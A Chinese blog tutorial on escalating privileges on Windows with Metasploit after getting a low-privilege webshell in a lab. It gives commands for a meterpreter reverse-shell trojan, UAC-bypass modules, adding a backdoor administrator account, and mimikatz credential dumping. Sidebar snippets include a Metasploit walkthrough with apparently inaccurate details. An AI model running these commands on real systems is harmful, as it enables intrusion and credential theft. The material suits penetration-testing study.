Metasploit拿到shell后 低权限---提权篇

最新推荐文章于 2023-12-04 19:19:53 发布
最新推荐文章于 2023-12-04 19:19:53 发布
阅读量1.4k 收藏
点赞数
分类专栏: kali工具篇 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58000413/article/details/126440857
版权

注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关!!!

一、分配权限

        a.进入到phpstudy的目录下

        b.对Apach下的logs文件与MySQL下的date文件分配,进入Apach下的logs文件,右键属性

         c.编辑 -> 添加,输入用户名 -> 检查名称 -> 确定

         d.勾选权限,除特殊权限

         e.高级 -> 添加 -> 选择主体 -> 输入用户名,检查名称 -> 确定

         f.赋予权限

        MySQL下的date文件也一样的操作 ,接下来给apache、mysqla服务指定低权限用户

        g.搜索服务

        h.找到apache服务

         i.右键属性 -> 登录 -> 浏览 -> 添加低权限用户  -> 确定 -> 输入账号密码 -> 重启服务(MySQLa服务同理)

 我们在搭建的网站中留个后门,连上蚁剑测试,确实是个低权限

二、提权

        方法一:systeminfo查看补丁号,在提权辅助网页查看漏洞号,下载exp,上传至服务器

        方法二:

                Suggester(找漏洞的工具)要求:python安装xlrd

                1.安装xlrd:        python2 -m pip install xlrd --upgrade

                2.更新漏洞库        python2 -m windows-exploit-suggester.py --update

                3.扫描systeminfo信息:看下这个系统可以提权的补丁有哪些

                4.进行对比python2 windows-exploit-suggester.py --database 2022-08-21-mssb.xls --systeminfo sys.txt

        注意:python2与python3安装suggester,指定文件-m

提权辅助工具:Windows--exploit-suggester.py安装及使用_DiDD的博客-CSDN博客_windows-exploit-suggester.py下载地址https://github.com/AonCyberLabs/Windows-Exploit-Suggester1、安装xlrd包(注意python2、3版本的pip问题)使用python2 的pip来安装xlrd包命令:python2-m pip install xlrd==1.2.0注意:安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:最近xlrd更新到了2.0.1版本,只支持.xls文件。所以pandas.read...https://blog.csdn.net/weixin_45650977/article/details/112554489                5.前面是E的可以在github上搜对应的exp,前面是M的则可以直接用msf

                6.审计本地可以利用的漏洞信息

                python2 windows-exploit-suggester.py --audit  -l  --database 2022-08-21-mssb.xls  --systeminfo sys.txt

                7.未使用补丁该系统可能存在漏洞

                python2  windows-exploit-suggester.py  --database  2022-08-21-mssb.xls  --systeminfo  sys.txt  --ostext  "Windows 10"

                8.找到相应的exp下载

                9.添加用户  net  user  admin   admin /add

                10.添加到管理员用户组  net  loca|group  administraors   admin /add

        方法三:

                1.创建一个基础木马:

                msfvenom -p windows/meterpreter/reverse_tcp  lhost=攻击机  lport=端口  -f exe  -o  shell.exe                                                                                            上传shell木马

                2.本地提权信息搜集可利用的模块

                use  post/multi/recon/local_exploit_suggerter

                3.设置payload

                set   payload  windows/meterpreter/reverse_tcp

                3.options设置lhost,lport

                提权:

                        绕过UAC进行提权UAC是什么意思?如何关闭UAC? - 科问吧

                                1.选择exploit                               

                                exploit/windows/local/bypassuac

                                exploit/windows/local/bypassuac_vbs

                                exploit/windows/local/bypassuac_injection

                                2.加载模块                               

                                load  -l        选择mimikatz

                                3.查看版本信息

                                mimikatz_command  -f  version

                                4.读取本地hash

                                mimikatz_command  -f  samdump::hashes

                                5.得到密码hash值,去md5解码

                        提高程序运行级别(runas)

                                利用exploit/windows/local/ask模块,受害机会有提示,提示用户是否要运行

                        利用windows提权漏洞进行提权

                                通过搜集到的漏洞进行攻击

三、获取管理员密码

        通过mimikatz获取管理员密码

        windows使用命令:

        需要管理员权限

        mimikatz.exe  log

        mimikatz # privilege::debug

        mimikatz # sekurlsa::logonpasswords

        mimikatz # exit

不习惯有你
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网络安全自学] 六十三.hack the box渗透之OpenAdmin题目及蚁剑管理员提权(四)
杨秀璋的专栏
03-27 1万+
在撰写这文章之前,我先简单分享下hack the box实验感受。hack the box是一个在线渗透平台,模拟了真实环境且难度较大,各种Web渗透工具及操作串联在一起,挺有意思的。本文详细讲解了hack the box机器配置,通过OpenAdmin题目分享管理员权限Flag获取流程,希望对您有所帮助。同时,该网站题目细节不便于透露,推荐大家亲自去尝试,本文更多的分享一些思想。
操作系统权限提升(二十)之Linux提权-计划任务提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-28 961
先准备一个SUID文件或者权限为xx7的文件,让权限的用户可以执行文件的修改,在这里我们我们准备一个sh文件或者python文件都可以,我们写一个linux运维脚本,来监控当前电脑的运行参数。linux计划任务提权是因为权限配置不当,计划任务以root权限运行,权限的用户可以修改计划任务的文件,从而被攻击者利用,导致提权,Linux计划任务命令如下。linux文件权第一部分是该文件的拥有者所拥有的权限,第二部分是该文件所在用户组的用户所拥有的权限,最后一部分是其他用户所拥有的权限
拿到GETSHELL之后的提权
weixin_69678131的博客
05-12 1296
getshell之后的提权
渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权
weixin_51803729的博客
02-12 5187
渗透测试Metasploit框架体验(5.理解MSF后渗透-之提权
Metasploit提权和后渗透
最新发布
Kali与编程
12-04 1502
后渗透技术包括提权、横向移动、持久化、数据窃取、漏洞利用等,攻击者可以利用这些技术和工具深入系统内部,并获取系统中的敏感信息、提高攻击者的权限、绕过防御措施等。在本文中,我将详细介绍Metasploit提权模块和技术,包括Windows和Linux系统下的提权模块和技术,以及如何使用Metasploit进行提权攻击。横向移动是指攻击者在入侵一个系统后,通过利用系统内部的漏洞或者获取其他用户的登录名和密码等方式,从一个系统进入另一个系统,进而攻击其他系统。
Mastering-Metasploit:掌握Metasploit书中的Metasploit模块
05-17
此存储库包含《掌握Metasploit手册》中涵盖的模块: #要将所有模块自动加载到metasploit: ... 将所有模块从book_meterpreter_scripts复制到/ usr / share / metasploit-framework / scripts / meterpreter
metasploit-4.17.1-2020080301-windows-x64-installer.exe
01-10
metasploit
Oracle 权限数据库账户得到 OS 访问权限 提权利用
09-11
大概意思就是说,如果 ORACLE 服务是用 administrator 账户启动的,你只要有一个具有 resource 和 connect 权限的数据库账户,就能利用 metasploit 的 smbrelay 功能,本地搭建一个 SMB 欺骗服务器, 来得到系统的访问...
python-sploitkit:用于构建类似Metasploit的控制台的Devkit
05-14
介绍该工具包旨在以类似于Metasploit的样式轻松构建框架控制台。 它提供了一个全面的界面来为其存储数据库定义CLI命令,模块和模型。设置pip install sploitkit用法从这一点来看, main.py具有以下代码: #!/usr/bin...
mad-metasploitMetasploit自定义模块,插件,资源脚本和很棒的metasploit集合
02-22
配置您的metasploit-framework目录 $ vim config/config.rb $metasploit_path = '/opt/metasploit-framework/embedded/framework/' # /usr/share/metasploit-framework 2-A。 互动模式 $ ./mad-metasploit 2-B。 ...
PHPwebshell提权源码
08-07
PHPwebshell提权源码 集合控制台 网路 链接 账户 打包 修改文件
记一次 AWD 比赛中曲折的 Linux 提权
Specif1c的博客
10-31 1698
使用 sqlmap -os-shell 可能导致获取到与目标系统相关的命令执行权限,但这与操作系统的 root 权限无关。-os-shell 的具体权限取决于目标系统上正在运行的 Web 应用程序的用户权限,而不是数据库的 root 权限。SUID是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。在数据库管理系统中,root 用户是具有最高权限的用户,可以执行所有管理任务,包括创建、删除、修改数据库对象以及用户帐户。
渗透怎么学?渗透测试中超全的提权思路来了!
bdfcfff77fa的博客
06-26 1067
尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞,漏洞)来获取shell。利用kali虚拟机msfVENOM编写反弹shell脚本被控制端发起的shell---通常用于被控制端因防火墙受限,权限不足、端口被占用。
记录一次后渗透提权
春日野穹
09-27 2091
前言~ 提权,顾名思义就是提高自己在服务器中的权限,当我们通过各种方法渗透进入一台服务器的内部,往往我们能的到的权限是很的,当我们得到一个权限shell时,就需要进行进一步操作,即提权。想要提权就需要进行信息收集,如果不能清除的了解一个网站的完整架构,哪下一步就无法行动,所以我们需要了解这个shell的主机是做什么的,我们拥有什么样的权限,面对的是怎样一个系统等。通过一些简单地信息收集,可...
linux提权笔记
wangqiao258的博客
11-20 135
【代码】linux提权笔记。
拿下shell提权技巧
09-11 491
提权的技巧分享:1.cmd拒绝访问就自己上传一个cmd.exe,自己上传的cmd是不限制后缀的,还可以是 cmd.com cmd.txt cmd.rar等 2.net user不能执行有时候是net.exe被删除了,可以先试试net1,不行就自己上 传一个net.exe 3.cmd执行exp没回显的解决方法:com路径那里输入exp路径 C:\RECYCLER\pr.exe,命令那...
反弹shell通过普通用户进行SUID提权
sGanYu
07-18 1216
如果普通账号tom需要修改密码,就要访问/etc/shadow,由于/etc/passwd文件是所有用户都可读的,如果用户的密码太简单或规律比较明显的话,一台普通的计算机就能够很容易地将它破解,因此对安全性要求较高的Linux系统都把加密后的口令字分离出来,单独存放在一个文件中,这个文件是/etc/shadow文件,有超级用户才拥有该文件读权限,但是该文件只有root能访问。当tom需要修改密码,passwd程序的所有者为root,tom用户执行passwd程序的过程中会暂时获得root权限。...
webshell提权
free_xiaochen的博客
09-11 8605
提权 提权前奏 提权:主要是针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得服务器权限 通常所处的权限:  ASP/PHP 匿名权限 ASPX USER权限 JSP 通常是系统权限 收集信息:  内外网 服务器系统和版本位数 服务器的补丁情况 服务器的安装软件情况 服务器的防护软件情况 端口情况 支持脚本情况 。。...
提权学习之旅——利用Metasploit提权
Lemon's blog
08-16 682
1
(1) 利用MS18-8120通过Metasploit对Windows提权
05-10
MS18-8120是一个Windows提权漏洞,它可以影响Windows 7 SP1 x86和x64、Windows 8.1 x86和x64、Windows Server 2008 R2 SP1、Windows Server 2012和Windows Server 2012 R2。这个漏洞是在Windows内核中存在一个缺陷,攻击者可以利用这个缺陷来提升他们的权限,从而执行任意代码。 下面是一些利用MS18-8120漏洞进行Windows提权的步骤: 1.使用Metasploit框架:Metasploit是一个开源的渗透测试框架,它可以帮助安全专业人员快速、高效地发现和利用漏洞。在这个案例中,我们将使用Metasploit框架来利用MS18-8120漏洞。 2. 扫描目标:首先,我们需要扫描目标系统以检测是否存在漏洞。使用Nmap或其他扫描工具扫描目标IP地址,如下所示: ``` nmap -sV -O targetIP ``` 3. 打开Metasploit:打开Kali Linux操作系统并打开Metasploit框架,使用以下命令: ``` msfconsole ``` 4. 搜索漏洞利用模块:在Metasploit控制台中,使用以下命令搜索与MS18-8120漏洞相关的模块: ``` search MS18-8120 ``` 5. 选择漏洞利用模块:从搜索结果中选择一个适合我们的漏洞利用模块。在这个案例中,我们将选择“exploit/windows/local/ms18_8120_dcom”,使用以下命令: ``` use exploit/windows/local/ms18_8120_dcom ``` 6. 配置漏洞利用模块:在我们使用模块之前,我们需要配置一些参数。使用以下命令来查看可用的参数: ``` show options ``` 7. 配置目标IP地址和端口号:我们需要设置目标IP地址和端口号。使用以下命令设置目标IP地址和端口号: ``` set RHOST targetIP set RPORT targetPort ``` 8. 运行漏洞利用模块:设置完参数后,使用以下命令运行漏洞利用模块: ``` run ``` 9. 检查提权结果:漏洞利用模块运行后,我们可以检查提权结果。使用以下命令检查当前用户的权限: ``` getuid ``` 如果返回结果为“NT AUTHORITY\SYSTEM”,则说明我们已经成功提升了我们的权限。 总结: 通过使用Metasploit框架和MS18-8120漏洞利用模块,我们可以快速、高效地进行Windows提权攻击。但是请注意,任何未经授权的攻击都是非法的。只有在合法的渗透测试环境中使用这些技术。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值